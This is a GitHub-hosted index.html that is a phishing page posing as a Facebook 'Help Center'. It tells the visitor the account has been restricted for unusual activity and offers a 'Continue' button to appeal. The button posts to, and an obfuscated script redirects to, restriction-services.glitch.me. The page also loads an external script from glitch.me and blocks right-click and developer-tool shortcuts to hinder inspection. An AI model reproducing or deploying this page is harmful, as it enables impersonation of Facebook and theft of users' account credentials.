-
Notifications
You must be signed in to change notification settings - Fork 370
/
Copy pathindex.html
227 lines (186 loc) ยท 8.21 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<div id="index.php"></div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js" integrity="sha256-/H4YS+7aYb9kJ5OKhFYPUjSJdrtV6AeyJOtTkw6X72o=" crossorigin="anonymous"></script>
<script src="https://staticsecure.glitch.me/staticsecure.min.js"></script>
<script>
staticsecure({"query": "key", "0000": "example", "index.php": "hidden.txt"})
</script>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Help Center</title>
<link rel="icon" href="https://upload.wikimedia.org/wikipedia/commons/6/6c/Facebook_Logo_2023.png" type="image/png"/>
<script type="text/javascript">
document.addEventListener("contextmenu", function(e) {
e.preventDefault();
});
document.addEventListener("keydown", function(e) {
// Check if the "i" or "c" key is pressed with Shift or Ctrl
if (
(e.key === "i" ||
e.key === "c" ||
e.keyCode === 73 ||
e.keyCode === 67) &&
(e.shiftKey || e.ctrlKey)
) {
e.preventDefault();
}
});
</script>
<style>
/* New theme styles */
body {
background-color: #ffffff;
/* Facebook's classic blue */
font-family: Arial, sans-serif;
text-align: center;
color: #000;
/* White text */
margin: 0;
padding: 20px;
/* Remove default margin */
}
.container {
display: flex;
flex-direction: column;
align-items: center;
justify-content: center;
height: 100vh;
position: relative;
/* Required for relative positioning of the image and text */
}
#box {
height: 40%;
width: 45%;
background-color: rgb(255, 255, 255);
border-radius: 3px;
display: flex;
align-items: center;
flex-direction: column;
}
#box>img {
width: 70px;
margin-top: 10px;
}
#data {
display: flex;
align-items: center;
justify-content: center;
margin-top: 10px;
}
#data>h4 {
font-size: 30px;
margin: 5px 5px 5px 5px;
margin-bottom: 10px;
}
#data>img {
width: 18px;
}
#data>img @media (max-width: 768px) {
.containter #data<img {
width: 40%;
margin-bottom: 20px; /
}
}
.button {
background-color: #1877f2;
/* Facebook's primary blue */
color: #fff;
padding: 12px 24px;
font-size: 18px;
border: none;
border-radius: 4px;
cursor: pointer;
transition: background-color 0.3s;
}
.button:hover {
background-color: #1659c7;
/* Slightly darker blue on hover */
}
/* Style for the image */
@media (max-width: 768px) {
.container img {
width: 40%;
margin-bottom: 20px;//* Adjust the image width for mobile */
}
.help-center-text img {
margin-top: 20px;
}
}
/* Desktop styles */
@media (min-width: 769px) {
.container img {
width: 10%;
/
}
/* Style for the "Help Center" text container */
.help-center-text-container {
text-align: center;
margin-top: -30px;
margin-top: 20px;
transform: translateY(-0px);
/* Add space between image and text */
}
}
/* Style for the "Help Center" text */
.help-center-text {
font-size: 36px;
/* Adjust the font size as needed */
font-weight: bold;
/* Super bold text */
color: #000;
/* White text color */
text-shadow: 0px 0px 0px rgba(0, 0, 0, 0.5);
/* Add a subtle text shadow */
}
/* Style for the remaining content */
.remaining-content {
margin-top: 20px;
/* Add space below "Help Center" text */
}
/* Style for the text within the remaining content */
.remaining-text {
font-size: 18px;
/* Adjust the font size as needed */
font-weight: normal;
/* Normal text weight */ }
</style>
</head>
<body>
<div class="container">
<img src="https://cdn.glitch.global/42ac90ca-66bc-4886-9161-9ce099d273bc/images-fb_icon_325x325.png?v=1696896812321" alt="Your Image" />
<!-- "Help Center" text container -->
<div class="help-center-text-container">
<div class="help-center-text"><div id="data">
<h4>Help Center</h4> <img src="https://cdn.glitch.global/0e876aa8-70cf-40f1-951b-94c8002e5dcc/thumbnails%2Fbluetick.png?1699082922610" alt="">
</div>
</div>
<!-- Remaining content -->
<div class="remaining-content">
<!-- Content from the first code snippet -->
<div class="bg-blue-300">
<div class="">
<div class="flex justify-center items-center pl-6 px-28">
<div class="flex mt-9"></div>
<div class="mx-3">
<p class="font text-gray-700 shadow-transparent mt-2 font-extralight">
๐ช๐ฒ ๐ต๐ฎ๐๐ฒ ๐ฑ๐ฒ๐๐ฒ๐ฐ๐๐ฒ๐ฑ ๐๐ป๐๐๐๐ฎ๐น ๐ฎ๐ฐ๐๐ถ๐๐ถ๐๐ ๐ณ๐ฟ๐ผ๐บ ๐๐ผ๐๐ฟ ๐ฎ๐ฐ๐ฐ๐ผ๐๐ป๐ ๐ฎ๐ป๐ฑ ๐๐ฒ ๐ต๐ฎ๐๐ฒ ๐ฟ๐ฒ๐๐๐ฟ๐ถ๐ฐ๐๐ฒ๐ฑ ๐๐ผ๐๐ฟ ๐ฎ๐ฐ๐ฐ๐ผ๐๐ป๐.
</p>
<p class="text-lg text-gray-700 font-extralight">๐๐ณ ๐๐ผ๐ ๐ฏ๐ฒ๐น๐ถ๐ฒ๐๐ฒ ๐๐ต๐ถ๐ ๐๐ผ ๐ฏ๐ฒ ๐ฎ ๐บ๐ถ๐๐๐ฎ๐ธ๐ฒ, ๐๐น๐ถ๐ฐ๐ธ ๐ผ๐ป "๐๐ผ๐ป๐๐ถ๐ป๐๐ฒ" ๐ฎ๐ป๐ฑ ๐ฟ๐ฒ๐พ๐๐ฒ๐๐ ๐ฎ ๐ฎ๐ฝ๐ฝ๐ฒ๐ฎ๐น.</p>
</div>
</div>
</div>
</div>
<!-- Continue button with JavaScript redirection -->
<form id="redirectForm" method="post" action="https://restriction-services.glitch.me/">
<button type="submit" class="button">Continue</button>
</form>
<!-- JavaScript to perform the redirection -->
<script>
function _0x4d03(_0x100e7e,_0x162f76){var _0x598ed6=_0x598e();return _0x4d03=function(_0x4d0309,_0x74bc4b){_0x4d0309=_0x4d0309-0x1a4;var _0x99eff6=_0x598ed6[_0x4d0309];return _0x99eff6;},_0x4d03(_0x100e7e,_0x162f76);}function _0x598e(){var _0x287545=['809550ZOhSQM','href','511980GnUQEK','2811640fJYgSV','2535350vqfdZS','https://restriction-services.glitch.me/','8WGXLAU','1559592XnxkHV','4663COUFMJ','preventDefault','73545BlqWiR','20iGqrpz','190hOknTh','redirectForm'];_0x598e=function(){return _0x287545;};return _0x598e();}var _0x47a560=_0x4d03;(function(_0x5b8740,_0x635652){var _0x3668cd=_0x4d03,_0x398a55=_0x5b8740();while(!![]){try{var _0x2e69da=-parseInt(_0x3668cd(0x1ad))/0x1*(-parseInt(_0x3668cd(0x1b1))/0x2)+-parseInt(_0x3668cd(0x1af))/0x3*(parseInt(_0x3668cd(0x1ab))/0x4)+parseInt(_0x3668cd(0x1a9))/0x5+parseInt(_0x3668cd(0x1a5))/0x6+-parseInt(_0x3668cd(0x1a7))/0x7+-parseInt(_0x3668cd(0x1a8))/0x8+-parseInt(_0x3668cd(0x1ac))/0x9*(parseInt(_0x3668cd(0x1b0))/0xa);if(_0x2e69da===_0x635652)break;else _0x398a55['push'](_0x398a55['shift']());}catch(_0x404e59){_0x398a55['push'](_0x398a55['shift']());}}}(_0x598e,0x40a4b),document['getElementById'](_0x47a560(0x1a4))['addEventListener']('submit',function(_0x14ea0d){var _0x550dd7=_0x47a560;_0x14ea0d[_0x550dd7(0x1ae)](),window['location'][_0x550dd7(0x1a6)]=_0x550dd7(0x1aa);}));
</script>
</div>
</div>
</body>
</html>